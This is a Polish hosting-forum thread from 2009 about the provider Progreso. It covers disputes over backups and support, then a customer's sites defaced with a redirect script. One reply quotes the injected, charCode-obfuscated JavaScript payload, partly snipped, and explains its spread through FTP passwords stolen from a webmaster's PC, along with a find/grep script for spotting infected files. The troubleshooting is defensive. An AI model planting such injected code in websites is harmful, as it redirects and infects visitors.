148 odpowiedzi na ten temat

[Adam Szendzielorz]

error_404, o 19.01.2009, 20:50, powiedział:

Interesujące. Rozmawiałem zatem z Tobą, szefie.
Z info na stronie WWW progreso:
- Adam Szendzielorz
- Wojtek Szczęch
Nie da się pomylić tych nazwisk. Zwłaszcza w sytuacji, gdy "szef" odbiera za każdym razem telefon.

Na pewno nie rozmawiales ze mna.

error_404, o 19.01.2009, 20:50, powiedział:

Skoro wałkujemy temat problemów w progreso, może wytłumaczysz złe funkcjonowanie extranetu. Myślę, że wiele osób zainteresuje czemu oferta firmy nie pokrywa się z realizacją usług.
Przypomnę - menedżer plików nie działa tak jak powinien

Menedzer plikow dziala tak, jak ma dzialac. Wszystkie jego udostepnione funkcje dzialaja prawidlowo.

error_404, o 19.01.2009, 20:50, powiedział:

a kopia baz danych jest niemożliwa do wykonania.

Bo extranet nie umozliwia *tworzenia* kopii zapasowych, tylko dostep do ostatniej kopii tworzonej przez nas automatycznie co 24h. Dostep jest w menu "Katalogi i pliki / kopie zapasowe" - do plikow oraz "Bazy danych / kopie zapasowe" - do baz MySQL. Na zyczenie dodatkowo mozemy udostepnic kopie plikow nawet do 3 miesiecy wstecz - z kazdego dnia (kopie przyrostowe). Mechanizm odzyskiwania kopii danych w extranecie sluzy glownie drobnym pomylkom typu "o kurde, skasowalem sobie katalog, co teraz zrobic!?".

error_404, o 19.01.2009, 20:50, powiedział:

Wcześniej ktoś napisał (z czym sie zgadzam), że jest również problem z wpisami do DNS

Napisal o tym wired. Mozliwosc dopisywania do DNSu jest w menu "Domeny - zmiana delegacji". Nie trzeba wysylac ticketu / zgloszenia.
pozdr.

[error_404]

adamszendzielorz, o 19.01.2009, 21:00, powiedział:

Bo extranet nie umozliwia *tworzenia* kopii zapasowych, tylko dostep do ostatniej kopii tworzonej przez nas automatycznie co 24h.

Chwyt reklamowy bardzo łatwy do zweryfikowania

Generalnie w ogóle nie są robione kopie baz danych, które mają być rzekomo widoczne w extranecie lub extranet w tym zakresie nie działa.

Nie chce mi się dłużej udowadniać że mleko jest białe. Zwłaszcza w sytuacji, gdy Szendzielorz uparcie twierdzi, że wszystko jest w porządku a rozmowy telefoniczne prowadziłem z kimś innym (ilu jest Szendzielorzy w progreso?).

Jesli ktoś chce samemu sprawdzić negatywne opinie na webhostingtalk o progreso to mówię jedno - zostaliście ostrzeżeni.

[Adam Szendzielorz]

error_404, o 20.01.2009, 08:46, powiedział:

Chwyt reklamowy bardzo łatwy do zweryfikowania
Generalnie w ogóle nie są robione kopie baz danych, które mają być rzekomo widoczne w extranecie lub extranet w tym zakresie nie działa.

W tym momencie juz troche przeginasz. Uwazasz, ze firma z 10-letnim doswiadczeniem nie robi kopii zapasowych ? Musielibysmy byc glupcami i miec wielkie szczescie zeby jeszcze istniec na rynku, a nigdy nie zdarzylo nam sie utracic danych klientow. Na potrzeby porzadnego, przyrostowego backupu (jestesmy w stanie odzyskac pliki z konkretnego wskazanego dnia nawet do 3 miesiecy wstecz) jakis czas temu kupilismy macierz backupowa 9TB.

error_404, o 20.01.2009, 08:46, powiedział:

Nie chce mi się dłużej udowadniać że mleko jest białe. Zwłaszcza w sytuacji, gdy Szendzielorz uparcie twierdzi, że wszystko jest w porządku a rozmowy telefoniczne prowadziłem z kimś innym (ilu jest Szendzielorzy w progreso?).

Jezeli rzeczywiscie twierdzisz, ze rozmawiales ze mna - to kilka Twoich poprzednich wypowiedzi (tych traktujacych o tym jak zostales telefonicznie potraktowany) jest *mocno* przekolorowana. A swoja droga - w Progreso Szendzielorzow jest trzech - prawnik i ksiegowa ale oni nie maja nic z helpdeskiem wspolnego
pozdr.

[error_404]

adamszendzielorz, o 20.01.2009, 09:04, powiedział:

W tym momencie juz troche przeginasz. Uwazasz, ze firma z 10-letnim doswiadczeniem nie robi kopii zapasowych ?

Nerwy Pana ponoszą, drogi Panie co widać już dość wyraźnie. Sądząc po sposobie argumentowania i stylu wypowiedzi, rozmawiałem telefonicznie z Panem. W rozmowie telefonicznej również nie rozumiał Pan tego, co mówiłem.

Teraz widać, że nie czyta Pan tekstu pisanego.

Nie napisałem, że firma nie robi kopii zapasowych ale "Generalnie w ogóle nie są robione kopie baz danych, które mają być rzekomo widoczne w extranecie lub extranet w tym zakresie nie działa". To zasadnicza różnica.

adamszendzielorz, o 20.01.2009, 09:04, powiedział:

Musielibysmy byc glupcami i miec wielkie szczescie zeby jeszcze istniec na rynku,

Muszę się mocno powstrzymywać przed skomentowaniem powyższego

adamszendzielorz, o 20.01.2009, 09:04, powiedział:

a nigdy nie zdarzylo nam sie utracic danych klientow.

Zupełnie inne opinie można znaleźć na webhostingtalk

adamszendzielorz, o 20.01.2009, 09:04, powiedział:

Na potrzeby porzadnego, przyrostowego backupu (jestesmy w stanie odzyskac pliki z konkretnego wskazanego dnia nawet do 3 miesiecy wstecz) jakis czas temu kupilismy macierz backupowa 9TB.

Z czystej formalności spytam - podłączyliście to urządzenie czy jak zwykle ktoś o czymś zapomniał?

adamszendzielorz, o 20.01.2009, 09:04, powiedział:

A swoja droga - w Progreso Szendzielorzow jest trzech - prawnik i ksiegowa ale oni nie maja nic z helpdeskiem wspolnego

Jeśli chodzi o progreso i o helpdesk, tu się zgadzamy ze sobą. Mało mają wspólnego pracownicy progreso z helpdeskiem.

[Adam Szendzielorz]

error_404, o 20.01.2009, 13:27, powiedział:

Nerwy Pana ponoszą, drogi Panie co widać już dość wyraźnie.

To forum. Na forum mowimy sobie per Ty
Jestem nadzwyczaj spokojnym czlowiekiem i bardzo trudno wyprowadzic mnie z rownowagi - uwierz na slowo, ze do "poniesienia" mnie przez nerwy jeszcze daleka droga :-)

error_404, o 20.01.2009, 13:27, powiedział:

[...]
Teraz widać, że nie czyta Pan tekstu pisanego.
Nie napisałem, że firma nie robi kopii zapasowych ale "Generalnie w ogóle nie są robione kopie baz danych, które mają być rzekomo widoczne w extranecie lub extranet w tym zakresie nie działa". To zasadnicza różnica.

No coz - jest tu paru klientow, niech oni sie wypowiedza, czy funkcja dziala, czy nie. Sprawdzilem pobieznie kilka losowych kont w extranecie i w kazdym backup dziala bezblednie. Przypomne backup plikow widoczny jest w menu "Katalogi i pliki -> kopie zapasowe", a backup baz w menu "Bazy danych (SQL) - kopie zapasowe". Dzialanie zreszta mozna sobie sprawdzic w wersji demo, ktora jest w pelni dzialajaca:

http://extranet.progreso.pl

login / haslo: demo

error_404, o 20.01.2009, 13:27, powiedział:

Z czystej formalności spytam - podłączyliście to urządzenie czy jak zwykle ktoś o czymś zapomniał?

Jak zwykle? Co jeszcze nam zarzucasz ? Narazie nic nie pokrywa sie z rzeczywistoscia.

error_404, o 20.01.2009, 13:27, powiedział:

Jeśli chodzi o progreso i o helpdesk, tu się zgadzamy ze sobą. Mało mają wspólnego pracownicy progreso z helpdeskiem.

Trudno zeby prawnik odpisywal na pytania o PHP ;-)
pozdr.

[nrm]

@adamszendzielorz i @error_404: proszę o przeniesienie dalszej dyskusji na priv gdyż już dawno przekroczyliście granicę w której wyraża się opinie o firmie/prostuje informacje, a teraz po prostu, kolokwialnie mówiąc, jedziecie po sobie.

[Adam Szendzielorz]

nrm, o 20.01.2009, 14:56, powiedział:

@adamszendzielorz i @error_404: proszę o przeniesienie dalszej dyskusji na priv gdyż już dawno przekroczyliście granicę w której wyraża się opinie o firmie/prostuje informacje, a teraz po prostu, kolokwialnie mówiąc, jedziecie po sobie.

OK juz sie zamykam :-)
pozdr.

[am123]

Witam.

Jestem klientem Progreso.pl od około 1 - 1,5 roku.
Naprawdę wysoko ceniłem świadczone usługi... do czasu gdy zacząłem mieć problemy z bezpieczeństwem.
A co za tym idzie z supportem i jakimkolwiek kontaktem z obsługą.
Kontakt telefoniczny: łączę się z sekretarką automatyczną, przełączam niby do jakiegoś działu i... nic - tak od kliku dni
Kontakt przez formularz: czasami dostanę na niego odpowiedź
Kontakt przez system zgłoszeń w panelu Extranet - ostatnia pilna wiadomość dotycząca zabezpieczeń i włamań na serwer wisi bez odpowiedzi od 24h - włamania są nadal dokonywane, administracja nie działa kompletnie.

A teraz właśnie w temacie włamań.
Od kilku dni na serwerze progreso dokonywane są włamania i podmienianie stron index.php lub index.html tzn dopisywanie skryptu przekierowującego na stronę dvcd.info.
Zgłaszałem to do tzw. supportu i dowiedziałem się że to luki w cms joomla ( to rozumiem ) ale takie same włamania
dokonywane są na plikach html będących w innych katalogach powyżej joomla.
Ponadto na innych serwerach na których mam serwisy na joomla ( te same wersje ) włamania nie są dokonywane
( home.pl , nazwa.pl ) czyli chyba wina leży po stronie usługodawcy - tzn. jego zabezpieczeń lub raczej braku takowych.
Jak wspominałem na ostatnią odp. z supportu ( zaznaczoną jako pilne ) czekam od ponad 24h - dodzwonić się nie mogę.

Proszę o radę co z tym zrobić ?

Ponadto po wstępnych rozmowach z klientami poleconymi do progreso przez moją firmę ustaliliśmy że trzeba będzie szybko uciekać od "takiego" usługodawcy - tzn. zerwać umowę a nie rozwiązać.

Jesli miałby ktoś propozycje ofertowe to poproszę ( interesuje mnie ( i klientów ) coś w okolicach serwera biznes plus w progreso)

Adam Michniewski
Raz, Dwa, Trzy Łódź
am@razdwatrzy.pl

[Tomi]

Jeżeli używasz niezałatanych skryptów to pretensje możesz mieć tylko do siebie.

Cytuj

Proszę o radę co z tym zrobić ?

Wymienić Joomle na wersję załataną lub
zlecić napisanie autorskiego CMSa

Trzeba leczyć przyczynę.

[am123]

OK.

Proszę tylko wytłumaczyć czemu u innych providerów nie występują tego typu usterki ?
Na dokładnie tych samych wersjach joomla !

Ponadto jak wspomniałem włamania dokonywane są także na strony html a nie tylko na strony cms-a.

Czy tym tokiem mam nie używać html ?

[regdos]

am123, o 12.02.2009, 13:53, powiedział:

Proszę tylko wytłumaczyć czemu u innych providerów nie występują tego typu usterki ?
Na dokładnie tych samych wersjach joomla !

Inne dodatki zainstalowane, ktoś wyjątkowo lubi Twoją stronę atakować, inne prawa plików, faktyczna inny konfiguracja serwera (ale to i tak włam ma miejsce przez joomle a nie przez serwer i winna jest temu joomla)

am123, o 12.02.2009, 13:53, powiedział:

Ponadto jak wspomniałem włamania dokonywane są także na strony html a nie tylko na strony cms-a.
Czy tym tokiem mam nie używać html ?

To normalne bo jeżeli te same prawa użytkownika odnoszą się do serwisu joomla jak i do innych katalogów to skrypt uruchomiony z prawami takimi jak joomla może sobie pobuszowaćć i pozmieniać pliki na innych serwisach.

[error_404]

am123, o 12.02.2009, 10:47, powiedział:

Proszę o radę co z tym zrobić ?

Zmień jak najszybciej hosting na inną firmę.

Obojętne jaką. Byle nie progreso.

[Adam Szendzielorz]

am123, o 12.02.2009, 13:53, powiedział:

OK.
Proszę tylko wytłumaczyć czemu u innych providerów nie występują tego typu usterki ?
Na dokładnie tych samych wersjach joomla !

Juz otrzymales na ten temat odpowiedz -> u nas masz register_globals ustawione na "On", co drastycznie zmniejsza bezpieczenstwo tego skryptu. Kwestia jednego wpisu w pliku php.ini. "Wlamy" nie maja nic wspolnego z bezpieczenstwem serwera - chodzi o dziurawa wersje Twojej Joomli. Niestety decydujac sie na uzywanie oprogramowania typu Open Source, trzeba przynajmniej raz na kilka dni sledzic aktualizacje, a najlepiej jezeli dany soft posiada - zapisac sie na grupe mailowa z informacjami o aktualizacjach.

Otwierajac zlodziejowi drzwi do domu na osciez, bedziesz winil producenta drzwi, jak Cie okradna ?
pozdr.

[Dariusz Cieślak]

am123, o 12.02.2009, 10:47, powiedział:

Od kilku dni na serwerze progreso dokonywane są włamania i podmienianie stron index.php lub index.html tzn dopisywanie skryptu przekierowującego na stronę dvcd.info.
Zgłaszałem to do tzw. supportu i dowiedziałem się że to luki w cms joomla ( to rozumiem ) ale takie same włamania
dokonywane są na plikach html będących w innych katalogach powyżej joomla.
Ponadto na innych serwerach na których mam serwisy na joomla ( te same wersje ) włamania nie są dokonywane
( home.pl , nazwa.pl ) czyli chyba wina leży po stronie usługodawcy - tzn. jego zabezpieczeń lub raczej braku takowych.

Niech zgadnę: pojawia się mniej więcej taki wpis:

Cytuj

<script language="JavaScript">function rkfg(jflq){return
String.fromCharCode(jflq);}var
ohhe="060105102114097109101032115114099061039104116116
(few lines snipped)
2105803210410510010010111005903906206004710510211
4097109101062";var ifdm="";for(qhxk=0;qhxk<ohhe.length;qhxk+=3)
{ifdm+=rkfg(ohhe.substr (qhxk, 3));}window.status='Done';
document.write(ifdm);</script>

Usunąłem tego wirusa niedawno u mojego klienta i zdiagnozowałem źródło jako wyciek haseł FTP. Wirus na maszynie webmastera przechwycił hasła do FTP i wysłał je na zewnętrzny serwer. Po jakimś czasie nastąpiło połączenie FTP spoza Europy w czasie którego:

• nastąpiło skanowanie konta w poszukiwaniu plików *.php *.html
  
• dla każdego znalezionego pliku: DOWNLOAD / UPLOAD widoczna w transfer.log serwera FTP

Sposób usunięcia wirusa:

• Wywalić wirusy ze stacji roboczych
  
• Zmiana haseł FTP dla wszystkich kont
  
• Przeskanowanie konta w poszukiwaniu zainfekowanych plików

W moim przypadku skanowanie wygląd tak (skrypt CGI na serwerze):

Cytuj

#!/bin/sh
echo Content-type: text/plain
echo
(
find . -name \*.html -o -name \*.php | xargs grep ""
) 2>&1

am123, proponuję zajrzeć do logów serwera FTP - jeśli znajdziesz tam podejrzane sekwencje DOWNLOAD/UPLOAD łatanie Joomli i zwalanie na progreso niewiele pomoże. Daj znać o wynikach śledztwa (sam jestem ciekawy jaki mechanizm włamu zadziałał u ciebie).

[am123]

Dziękuję...

Wreszcie coś konstruktywnego.

Wykonałem część założeń z postu - czekam na efekty.

W takim bądź razie wyciek haseł FTP jest po czyjej stronie ? Providera czy dziurawego skryptu cms ?

[regdos]

am123, o 16.02.2009, 13:47, powiedział:

W takim bądź razie wyciek haseł FTP jest po czyjej stronie ? Providera czy dziurawego skryptu cms ?

A przeczytałeś ze zrozumieniem to co Ci Dariusz Cieślak napisał ?

Wyciek haseł jest po stronie komputerów klienckich !! Co nie ma nic wspólnego z Provaiderem i z cms-em.

[Dariusz Cieślak]

Na początek errata:

Cytuj

find . -name \*.html -o -name \*.php | xargs grep ""

Tu edytor wyciął mi fragment, powinno być: find . -name \*.html -o -name \*.php | xargs grep "<!-- ad -->"

am123, o 16.02.2009, 13:47, powiedział:

W takim bądź razie wyciek haseł FTP jest po czyjej stronie ? Providera czy dziurawego skryptu cms ?

Nie wiem jak jest u ciebie. Na serwerze nie miałem Joomli (tym bardziej niezałatanej) - u mnie podejrzewam wyciek z wirusa na stacji roboczej (keylogger lub wyłuskanie zapisaneych haseł do FTP). Tym bardziej, że wirus skopiował się także na inne serwery do których był dostęp z tego komputera.

Czy są jakieś wyniki z analizy logów FTP?

Więcej szczegółów na temat wirusa: tutaj.

[bzx]

korzystam z progreso od 2 lat czy coś w tym stylu.

ogólnie jest dużo plusów ale i minus duży zauważam, szczególnie ostatnio.

na plus:
- shell (przydaje się)
- email, ftp, domeny, sub, etc - bez ograniczeń
- miły w obsłudze extranet
- obsługa techniczna bez zarzutu (mialem przewaznie małe akcje i szło to sprawnie)
- ogólnie bardzo w porządku ludzie, można się dogadać.

na minus:
- ostatnio mulenie nie do wytrzymania - mam postawioną małą stronkę na wordpressie (zaktualizowanym), prawie bez grafiki i w ogole mega prosta i lekka, ale no muli strasznie. aha trzymam na tym serwerze jakies tam stronki klientów ale to dosłownie 4 takie miniaturowe sajty z bardzo małą ilością odwiedzin.. więc widocznie serwer na ktorym mnie usadowili jest dosc zamulony innym klientem. nie wiem czy po zakonczeniu tego okresu nie przerzuce się na cos innego, co spełni moje dość niewielkie oczekiwania.

pozdrawiam
bzx

[am123]

Efekty:

Okazało się ( zgodnie z w.w. sugestiami ) że wirus był w komputerze stacjonarnym ( moim ), wykradał hasła
do ftp, łączył się i na index-y php i html doklejał złośliwy kod.

Czyli wina nie leżała po stronie usługodawcy, jednak sposób w jaki się o tym dowiedziałem czyli tydzień walki
bez odpowiedzi lub chyba z jedną żebym był dokładny - że to wina dziurawych skryptów - przekonał mnie
że SUPPORT to najważniejsza rzecz po jakości usług - czasem nawet odwrotnie.

Tutaj w skali ocen 1-10 support mogę ocenić na 2-3. W sumie odpowiedzieli ale nie wniosło to kompletnie nic
w mój problem jako klienta - choć wina leżała jak się okazało po mojej stronie a dokładnie stronie na którą wszedłem
z zainfekowanym hackiem.

Tego hacka wykrywa tylko google chrom i blokuje stronę, inne przeglądarki czytają takie strony i psuja się bez problemów.

Gdyby ktoś miał podobne symptomy radzę: usunąć zapisane hasła w programach ftp, zmienić hasła, przeinstalować system i używać haseł z palca ;-)

[mr.suchy]

moze troche zrobie OF ale musze jak czytam ostatni post Pana @am123. Radze zainstalowac program antywirusowy, firewall. SUPPORT firmy Progreso nie ochroni Pana @am123 przed zlapaniem wirusa. Radze wszystkim, przed napisanie postu (negatywnego) na temat usulg jakiekolwiek firmy, zastanowic sie. Nie sluchaj w 100% odpowiedz uzytkownikow z forum joomla, wordpress pt. "To wina hostingu"...zastanowic sie. Podziwiam @adamszendzielorz za nerwy na wodzy.

Pozdrawiam